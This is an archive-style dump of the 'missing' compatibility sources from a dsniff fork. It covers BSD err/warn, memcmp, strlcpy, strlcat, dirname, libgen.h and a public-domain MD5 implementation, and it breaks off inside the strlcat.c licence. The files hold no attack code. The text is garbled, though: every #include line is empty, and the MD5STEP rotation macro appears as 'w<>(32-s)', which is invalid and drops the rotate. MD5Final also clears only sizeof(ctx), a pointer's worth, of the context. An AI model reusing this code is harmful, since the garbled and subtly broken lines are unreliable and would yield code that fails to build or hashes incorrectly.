epsilonepsilonhackerschoice-dsniff-a17510d/missing/strlcat.h0000664000175000017500000000007015105626144021305 0ustar epsilonepsilonsize_t strlcat(char *dst, const char *src, size_t siz); hackerschoice-dsniff-a17510d/missing/err.c0000664000175000017500000000547615105626144020433 0ustar epsilonepsilon/* * err.c * * Adapted from OpenBSD libc *err* *warn* code. * * Copyright (c) 2000 Dug Song * * Copyright (c) 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #include #include #include #include #include void err(int eval, const char *fmt, ...) { va_list ap; va_start(ap, fmt); if (fmt != NULL) { (void)vfprintf(stderr, fmt, ap); (void)fprintf(stderr, ": "); } va_end(ap); (void)fprintf(stderr, "%s\n", strerror(errno)); exit(eval); } void warn(const char *fmt, ...) { va_list ap; va_start(ap, fmt); if (fmt != NULL) { (void)vfprintf(stderr, fmt, ap); (void)fprintf(stderr, ": "); } va_end(ap); (void)fprintf(stderr, "%s\n", strerror(errno)); } void errx(int eval, const char *fmt, ...) { va_list ap; va_start(ap, fmt); if (fmt != NULL) (void)vfprintf(stderr, fmt, ap); (void)fprintf(stderr, "\n"); va_end(ap); exit(eval); } void warnx(const char *fmt, ...) { va_list ap; va_start(ap, fmt); if (fmt != NULL) (void)vfprintf(stderr, fmt, ap); (void)fprintf(stderr, "\n"); va_end(ap); } hackerschoice-dsniff-a17510d/missing/err.h0000664000175000017500000000421615105626144020427 0ustar epsilonepsilon/* * err.h * * Adapted from OpenBSD libc *err* *warn* code. * * Copyright (c) 2000 Dug Song * * Copyright (c) 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)err.h 8.1 (Berkeley) 6/2/93 */ #ifndef _ERR_H_ #define _ERR_H_ void err(int eval, const char *fmt, ...); void warn(const char *fmt, ...); void errx(int eval, const char *fmt, ...); void warnx(const char *fmt, ...); #endif /* !_ERR_H_ */ hackerschoice-dsniff-a17510d/missing/memcmp.c0000664000175000017500000000430715105626144021111 0ustar epsilonepsilon/* $Id: memcmp.c,v 1.1 2000/11/29 13:57:46 dugsong Exp $ */ /*- * Copyright (c) 1990 The Regents of the University of California. * All rights reserved. * * This code is derived from software contributed to Berkeley by * Chris Torek. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #include /* * Compare memory regions. */ int memcmp(s1, s2, n) const void *s1, *s2; size_t n; { if (n != 0) { register const unsigned char *p1 = s1, *p2 = s2; do { if (*p1++ != *p2++) return (*--p1 - *--p2); } while (--n != 0); } return (0); } hackerschoice-dsniff-a17510d/missing/md5.c0000664000175000017500000002774315105626144020331 0ustar epsilonepsilon/* * This code implements the MD5 message-digest algorithm. * The algorithm is due to Ron Rivest. This code was * written by Colin Plumb in 1993, no copyright is claimed. * This code is in the public domain; do with it what you wish. * * Equivalent code is available from RSA Data Security, Inc. * This code has been tested against that, and is equivalent, * except that you don't need to include two pages of legalese * with every copy. * * To compute the message digest of a chunk of bytes, declare an * MD5Context structure, pass it to MD5Init, call MD5Update as * needed on buffers full of bytes, and then call MD5Final, which * will fill a supplied 16-byte array with the digest. */ #include "config.h" #include #include /* for memcpy() */ #include "md5.h" #ifndef HIGHFIRST #define byteReverse(buf, len) /* Nothing */ #else void byteReverse(unsigned char *buf, unsigned longs); #ifndef ASM_MD5 /* * Note: this code is harmless on little-endian machines. */ void byteReverse(unsigned char *buf, unsigned longs) { u_int32_t t; do { t = (u_int32_t) ((unsigned) buf[3] << 8 | buf[2]) << 16 | ((unsigned) buf[1] << 8 | buf[0]); *(u_int32_t *) buf = t; buf += 4; } while (--longs); } #endif #endif /* * Start MD5 accumulation. Set bit count to 0 and buffer to mysterious * initialization constants. */ void MD5Init(struct MD5Context *ctx) { ctx->buf[0] = 0x67452301; ctx->buf[1] = 0xefcdab89; ctx->buf[2] = 0x98badcfe; ctx->buf[3] = 0x10325476; ctx->bits[0] = 0; ctx->bits[1] = 0; } /* * Update context to reflect the concatenation of another buffer full * of bytes. */ void MD5Update(struct MD5Context *ctx, unsigned char const *buf, unsigned len) { u_int32_t t; /* Update bitcount */ t = ctx->bits[0]; if ((ctx->bits[0] = t + ((u_int32_t) len << 3)) < t) ctx->bits[1]++; /* Carry from low to high */ ctx->bits[1] += len >> 29; t = (t >> 3) & 0x3f; /* Bytes already in shsInfo->data */ /* Handle any leading odd-sized chunks */ if (t) { unsigned char *p = (unsigned char *) ctx->in + t; t = 64 - t; if (len < t) { memcpy(p, buf, len); return; } memcpy(p, buf, t); byteReverse(ctx->in, 16); MD5Transform(ctx->buf, (u_int32_t *) ctx->in); buf += t; len -= t; } /* Process data in 64-byte chunks */ while (len >= 64) { memcpy(ctx->in, buf, 64); byteReverse(ctx->in, 16); MD5Transform(ctx->buf, (u_int32_t *) ctx->in); buf += 64; len -= 64; } /* Handle any remaining bytes of data. */ memcpy(ctx->in, buf, len); } /* * Final wrapup - pad to 64-byte boundary with the bit pattern * 1 0* (64-bit count of bits processed, MSB-first) */ void MD5Final(unsigned char digest[16], struct MD5Context *ctx) { unsigned count; unsigned char *p; /* Compute number of bytes mod 64 */ count = (ctx->bits[0] >> 3) & 0x3F; /* Set the first char of padding to 0x80. This is safe since there is always at least one byte free */ p = ctx->in + count; *p++ = 0x80; /* Bytes of padding needed to make 64 bytes */ count = 64 - 1 - count; /* Pad out to 56 mod 64 */ if (count < 8) { /* Two lots of padding: Pad the first block to 64 bytes */ memset(p, 0, count); byteReverse(ctx->in, 16); MD5Transform(ctx->buf, (u_int32_t *) ctx->in); /* Now fill the next block with 56 bytes */ memset(ctx->in, 0, 56); } else { /* Pad block to 56 bytes */ memset(p, 0, count - 8); } byteReverse(ctx->in, 14); /* Append length in bits and transform */ ((u_int32_t *) ctx->in)[14] = ctx->bits[0]; ((u_int32_t *) ctx->in)[15] = ctx->bits[1]; MD5Transform(ctx->buf, (u_int32_t *) ctx->in); byteReverse((unsigned char *) ctx->buf, 4); memcpy(digest, ctx->buf, 16); memset(ctx, 0, sizeof(ctx)); /* In case it's sensitive */ } #ifndef ASM_MD5 /* The four core functions - F1 is optimized somewhat */ /* #define F1(x, y, z) (x & y | ~x & z) */ #define F1(x, y, z) (z ^ (x & (y ^ z))) #define F2(x, y, z) F1(z, x, y) #define F3(x, y, z) (x ^ y ^ z) #define F4(x, y, z) (y ^ (x | ~z)) /* This is the central step in the MD5 algorithm. */ #ifdef __PUREC__ #define MD5STEP(f, w, x, y, z, data, s) \ ( w += f /*(x, y, z)*/ + data, w = w<>(32-s), w += x ) #else #define MD5STEP(f, w, x, y, z, data, s) \ ( w += f(x, y, z) + data, w = w<>(32-s), w += x ) #endif /* * The core of the MD5 algorithm, this alters an existing MD5 hash to * reflect the addition of 16 longwords of new data. MD5Update blocks * the data and converts bytes into longwords for this routine. */ void MD5Transform(u_int32_t buf[4], u_int32_t const in[16]) { register u_int32_t a, b, c, d; a = buf[0]; b = buf[1]; c = buf[2]; d = buf[3]; #ifdef __PUREC__ /* PureC Weirdness... (GG) */ MD5STEP(F1(b,c,d), a, b, c, d, in[0] + 0xd76aa478L, 7); MD5STEP(F1(a,b,c), d, a, b, c, in[1] + 0xe8c7b756L, 12); MD5STEP(F1(d,a,b), c, d, a, b, in[2] + 0x242070dbL, 17); MD5STEP(F1(c,d,a), b, c, d, a, in[3] + 0xc1bdceeeL, 22); MD5STEP(F1(b,c,d), a, b, c, d, in[4] + 0xf57c0fafL, 7); MD5STEP(F1(a,b,c), d, a, b, c, in[5] + 0x4787c62aL, 12); MD5STEP(F1(d,a,b), c, d, a, b, in[6] + 0xa8304613L, 17); MD5STEP(F1(c,d,a), b, c, d, a, in[7] + 0xfd469501L, 22); MD5STEP(F1(b,c,d), a, b, c, d, in[8] + 0x698098d8L, 7); MD5STEP(F1(a,b,c), d, a, b, c, in[9] + 0x8b44f7afL, 12); MD5STEP(F1(d,a,b), c, d, a, b, in[10] + 0xffff5bb1L, 17); MD5STEP(F1(c,d,a), b, c, d, a, in[11] + 0x895cd7beL, 22); MD5STEP(F1(b,c,d), a, b, c, d, in[12] + 0x6b901122L, 7); MD5STEP(F1(a,b,c), d, a, b, c, in[13] + 0xfd987193L, 12); MD5STEP(F1(d,a,b), c, d, a, b, in[14] + 0xa679438eL, 17); MD5STEP(F1(c,d,a), b, c, d, a, in[15] + 0x49b40821L, 22); MD5STEP(F2(b,c,d), a, b, c, d, in[1] + 0xf61e2562L, 5); MD5STEP(F2(a,b,c), d, a, b, c, in[6] + 0xc040b340L, 9); MD5STEP(F2(d,a,b), c, d, a, b, in[11] + 0x265e5a51L, 14); MD5STEP(F2(c,d,a), b, c, d, a, in[0] + 0xe9b6c7aaL, 20); MD5STEP(F2(b,c,d), a, b, c, d, in[5] + 0xd62f105dL, 5); MD5STEP(F2(a,b,c), d, a, b, c, in[10] + 0x02441453L, 9); MD5STEP(F2(d,a,b), c, d, a, b, in[15] + 0xd8a1e681L, 14); MD5STEP(F2(c,d,a), b, c, d, a, in[4] + 0xe7d3fbc8L, 20); MD5STEP(F2(b,c,d), a, b, c, d, in[9] + 0x21e1cde6L, 5); MD5STEP(F2(a,b,c), d, a, b, c, in[14] + 0xc33707d6L, 9); MD5STEP(F2(d,a,b), c, d, a, b, in[3] + 0xf4d50d87L, 14); MD5STEP(F2(c,d,a), b, c, d, a, in[8] + 0x455a14edL, 20); MD5STEP(F2(b,c,d), a, b, c, d, in[13] + 0xa9e3e905L, 5); MD5STEP(F2(a,b,c), d, a, b, c, in[2] + 0xfcefa3f8L, 9); MD5STEP(F2(d,a,b), c, d, a, b, in[7] + 0x676f02d9L, 14); MD5STEP(F2(c,d,a), b, c, d, a, in[12] + 0x8d2a4c8aL, 20); MD5STEP(F3(b,c,d), a, b, c, d, in[5] + 0xfffa3942L, 4); MD5STEP(F3(a,b,c), d, a, b, c, in[8] + 0x8771f681L, 11); MD5STEP(F3(d,a,b), c, d, a, b, in[11] + 0x6d9d6122L, 16); MD5STEP(F3(c,d,a), b, c, d, a, in[14] + 0xfde5380cL, 23); MD5STEP(F3(b,c,d), a, b, c, d, in[1] + 0xa4beea44L, 4); MD5STEP(F3(a,b,c), d, a, b, c, in[4] + 0x4bdecfa9L, 11); MD5STEP(F3(d,a,b), c, d, a, b, in[7] + 0xf6bb4b60L, 16); MD5STEP(F3(c,d,a), b, c, d, a, in[10] + 0xbebfbc70L, 23); MD5STEP(F3(b,c,d), a, b, c, d, in[13] + 0x289b7ec6L, 4); MD5STEP(F3(a,b,c), d, a, b, c, in[0] + 0xeaa127faL, 11); MD5STEP(F3(d,a,b), c, d, a, b, in[3] + 0xd4ef3085L, 16); MD5STEP(F3(c,d,a), b, c, d, a, in[6] + 0x04881d05L, 23); MD5STEP(F3(b,c,d), a, b, c, d, in[9] + 0xd9d4d039L, 4); MD5STEP(F3(a,b,c), d, a, b, c, in[12] + 0xe6db99e5L, 11); MD5STEP(F3(d,a,b), c, d, a, b, in[15] + 0x1fa27cf8L, 16); MD5STEP(F3(c,d,a), b, c, d, a, in[2] + 0xc4ac5665L, 23); MD5STEP(F4(b,c,d), a, b, c, d, in[0] + 0xf4292244L, 6); MD5STEP(F4(a,b,c), d, a, b, c, in[7] + 0x432aff97L, 10); MD5STEP(F4(d,a,b), c, d, a, b, in[14] + 0xab9423a7L, 15); MD5STEP(F4(c,d,a), b, c, d, a, in[5] + 0xfc93a039L, 21); MD5STEP(F4(b,c,d), a, b, c, d, in[12] + 0x655b59c3L, 6); MD5STEP(F4(a,b,c), d, a, b, c, in[3] + 0x8f0ccc92L, 10); MD5STEP(F4(d,a,b), c, d, a, b, in[10] + 0xffeff47dL, 15); MD5STEP(F4(c,d,a), b, c, d, a, in[1] + 0x85845dd1L, 21); MD5STEP(F4(b,c,d), a, b, c, d, in[8] + 0x6fa87e4fL, 6); MD5STEP(F4(a,b,c), d, a, b, c, in[15] + 0xfe2ce6e0L, 10); MD5STEP(F4(d,a,b), c, d, a, b, in[6] + 0xa3014314L, 15); MD5STEP(F4(c,d,a), b, c, d, a, in[13] + 0x4e0811a1L, 21); MD5STEP(F4(b,c,d), a, b, c, d, in[4] + 0xf7537e82L, 6); MD5STEP(F4(a,b,c), d, a, b, c, in[11] + 0xbd3af235L, 10); MD5STEP(F4(d,a,b), c, d, a, b, in[2] + 0x2ad7d2bbL, 15); MD5STEP(F4(c,d,a), b, c, d, a, in[9] + 0xeb86d391L, 21); #else MD5STEP(F1, a, b, c, d, in[0] + 0xd76aa478, 7); MD5STEP(F1, d, a, b, c, in[1] + 0xe8c7b756, 12); MD5STEP(F1, c, d, a, b, in[2] + 0x242070db, 17); MD5STEP(F1, b, c, d, a, in[3] + 0xc1bdceee, 22); MD5STEP(F1, a, b, c, d, in[4] + 0xf57c0faf, 7); MD5STEP(F1, d, a, b, c, in[5] + 0x4787c62a, 12); MD5STEP(F1, c, d, a, b, in[6] + 0xa8304613, 17); MD5STEP(F1, b, c, d, a, in[7] + 0xfd469501, 22); MD5STEP(F1, a, b, c, d, in[8] + 0x698098d8, 7); MD5STEP(F1, d, a, b, c, in[9] + 0x8b44f7af, 12); MD5STEP(F1, c, d, a, b, in[10] + 0xffff5bb1, 17); MD5STEP(F1, b, c, d, a, in[11] + 0x895cd7be, 22); MD5STEP(F1, a, b, c, d, in[12] + 0x6b901122, 7); MD5STEP(F1, d, a, b, c, in[13] + 0xfd987193, 12); MD5STEP(F1, c, d, a, b, in[14] + 0xa679438e, 17); MD5STEP(F1, b, c, d, a, in[15] + 0x49b40821, 22); MD5STEP(F2, a, b, c, d, in[1] + 0xf61e2562, 5); MD5STEP(F2, d, a, b, c, in[6] + 0xc040b340, 9); MD5STEP(F2, c, d, a, b, in[11] + 0x265e5a51, 14); MD5STEP(F2, b, c, d, a, in[0] + 0xe9b6c7aa, 20); MD5STEP(F2, a, b, c, d, in[5] + 0xd62f105d, 5); MD5STEP(F2, d, a, b, c, in[10] + 0x02441453, 9); MD5STEP(F2, c, d, a, b, in[15] + 0xd8a1e681, 14); MD5STEP(F2, b, c, d, a, in[4] + 0xe7d3fbc8, 20); MD5STEP(F2, a, b, c, d, in[9] + 0x21e1cde6, 5); MD5STEP(F2, d, a, b, c, in[14] + 0xc33707d6, 9); MD5STEP(F2, c, d, a, b, in[3] + 0xf4d50d87, 14); MD5STEP(F2, b, c, d, a, in[8] + 0x455a14ed, 20); MD5STEP(F2, a, b, c, d, in[13] + 0xa9e3e905, 5); MD5STEP(F2, d, a, b, c, in[2] + 0xfcefa3f8, 9); MD5STEP(F2, c, d, a, b, in[7] + 0x676f02d9, 14); MD5STEP(F2, b, c, d, a, in[12] + 0x8d2a4c8a, 20); MD5STEP(F3, a, b, c, d, in[5] + 0xfffa3942, 4); MD5STEP(F3, d, a, b, c, in[8] + 0x8771f681, 11); MD5STEP(F3, c, d, a, b, in[11] + 0x6d9d6122, 16); MD5STEP(F3, b, c, d, a, in[14] + 0xfde5380c, 23); MD5STEP(F3, a, b, c, d, in[1] + 0xa4beea44, 4); MD5STEP(F3, d, a, b, c, in[4] + 0x4bdecfa9, 11); MD5STEP(F3, c, d, a, b, in[7] + 0xf6bb4b60, 16); MD5STEP(F3, b, c, d, a, in[10] + 0xbebfbc70, 23); MD5STEP(F3, a, b, c, d, in[13] + 0x289b7ec6, 4); MD5STEP(F3, d, a, b, c, in[0] + 0xeaa127fa, 11); MD5STEP(F3, c, d, a, b, in[3] + 0xd4ef3085, 16); MD5STEP(F3, b, c, d, a, in[6] + 0x04881d05, 23); MD5STEP(F3, a, b, c, d, in[9] + 0xd9d4d039, 4); MD5STEP(F3, d, a, b, c, in[12] + 0xe6db99e5, 11); MD5STEP(F3, c, d, a, b, in[15] + 0x1fa27cf8, 16); MD5STEP(F3, b, c, d, a, in[2] + 0xc4ac5665, 23); MD5STEP(F4, a, b, c, d, in[0] + 0xf4292244, 6); MD5STEP(F4, d, a, b, c, in[7] + 0x432aff97, 10); MD5STEP(F4, c, d, a, b, in[14] + 0xab9423a7, 15); MD5STEP(F4, b, c, d, a, in[5] + 0xfc93a039, 21); MD5STEP(F4, a, b, c, d, in[12] + 0x655b59c3, 6); MD5STEP(F4, d, a, b, c, in[3] + 0x8f0ccc92, 10); MD5STEP(F4, c, d, a, b, in[10] + 0xffeff47d, 15); MD5STEP(F4, b, c, d, a, in[1] + 0x85845dd1, 21); MD5STEP(F4, a, b, c, d, in[8] + 0x6fa87e4f, 6); MD5STEP(F4, d, a, b, c, in[15] + 0xfe2ce6e0, 10); MD5STEP(F4, c, d, a, b, in[6] + 0xa3014314, 15); MD5STEP(F4, b, c, d, a, in[13] + 0x4e0811a1, 21); MD5STEP(F4, a, b, c, d, in[4] + 0xf7537e82, 6); MD5STEP(F4, d, a, b, c, in[11] + 0xbd3af235, 10); MD5STEP(F4, c, d, a, b, in[2] + 0x2ad7d2bb, 15); MD5STEP(F4, b, c, d, a, in[9] + 0xeb86d391, 21); #endif buf[0] += a; buf[1] += b; buf[2] += c; buf[3] += d; } #endif hackerschoice-dsniff-a17510d/missing/md5.h0000664000175000017500000000077415105626144020331 0ustar epsilonepsilon#ifndef MD5_H #define MD5_H struct MD5Context { u_int32_t buf[4]; u_int32_t bits[2]; unsigned char in[64]; }; void MD5Init(struct MD5Context *context); void MD5Update(struct MD5Context *context, unsigned char const *buf, unsigned len); void MD5Final(unsigned char digest[16], struct MD5Context *context); void MD5Transform(u_int32_t buf[4], u_int32_t const in[16]); /* * This is needed to make RSAREF happy on some MS-DOS compilers. */ typedef struct MD5Context MD5_CTX; #endif /* !MD5_H */ hackerschoice-dsniff-a17510d/missing/strlcpy.c0000664000175000017500000000445615105626144021340 0ustar epsilonepsilon/* $Id: strlcpy.c,v 1.1 2000/04/08 20:50:28 dugsong Exp $ */ /* $OpenBSD: strlcpy.c,v 1.2 1998/11/06 04:33:16 wvdputte Exp $ */ /* * Copyright (c) 1998 Todd C. Miller * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. The name of the author may not be used to endorse or promote products * derived from this software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL * THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #if defined(LIBC_SCCS) && !defined(lint) static char *rcsid = "$OpenBSD: strlcpy.c,v 1.2 1998/11/06 04:33:16 wvdputte Exp $"; #endif /* LIBC_SCCS and not lint */ #include #include /* * Copy src to string dst of size siz. At most siz-1 characters * will be copied. Always NUL terminates (unless siz == 0). * Returns strlen(src); if retval >= siz, truncation occurred. */ size_t strlcpy(dst, src, siz) char *dst; const char *src; size_t siz; { register char *d = dst; register const char *s = src; register size_t n = siz; if (n == 0) return(strlen(s)); while (*s != '\0') { if (n != 1) { *d++ = *s; n--; } s++; } *d = '\0'; return(s - src); /* count does not include NUL */ } hackerschoice-dsniff-a17510d/missing/libgen.h0000664000175000017500000000330215105626144021072 0ustar epsilonepsilon/* * libgen.h * * Adapted from OpenBSD libc *err* *warn* code. * * Copyright (c) 2000 Dug Song * * Copyright (c) 1997 Todd C. Miller * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. The name of the author may not be used to endorse or promote products * derived from this software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL * THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #ifndef _LIBGEN_H_ #define _LIBGEN_H_ char *basename(const char *); char *dirname(const char *); #endif /* _LIBGEN_H_ */ hackerschoice-dsniff-a17510d/missing/dirname.c0000664000175000017500000000470115105626144021250 0ustar epsilonepsilon/* $Id: dirname.c,v 1.1 2000/04/08 20:50:28 dugsong Exp $ */ /* $OpenBSD: dirname.c,v 1.4 1999/05/30 17:10:30 espie Exp $ */ /* * Copyright (c) 1997 Todd C. Miller * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. The name of the author may not be used to endorse or promote products * derived from this software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL * THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #include #include #include char * dirname(path) const char *path; { static char bname[MAXPATHLEN]; register const char *endp; /* Empty or NULL string gets treated as "." */ if (path == NULL || *path == '\0') { (void)strcpy(bname, "."); return(bname); } /* Strip trailing slashes */ endp = path + strlen(path) - 1; while (endp > path && *endp == '/') endp--; /* Find the start of the dir */ while (endp > path && *endp != '/') endp--; /* Either the dir is "/" or there are no slashes */ if (endp == path) { (void)strcpy(bname, *endp == '/' ? "/" : "."); return(bname); } else { do { endp--; } while (endp > path && *endp == '/'); } if (endp - path + 1 > sizeof(bname)) { errno = ENAMETOOLONG; return(NULL); } (void)strncpy(bname, path, endp - path + 1); bname[endp - path + 1] = '\0'; return(bname); } hackerschoice-dsniff-a17510d/missing/strlcpy.h0000664000175000017500000000007015105626144021331 0ustar epsilonepsilonsize_t strlcpy(char *dst, const char *src, size_t siz); hackerschoice-dsniff-a17510d/missing/strlcat.c0000664000175000017500000000500215105626144021300 0ustar epsilonepsilon/* $Id: strlcat.c,v 1.1 2000/04/08 20:50:28 dugsong Exp $ */ /* $OpenBSD: strlcat.c,v 1.1 1998/07/01 01:29:45 millert Exp $ */ /* * Copyright (c) 1998 Todd C. Miller * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. The name of the author may not be used to endorse or promote products * derived from this software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL * THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; * 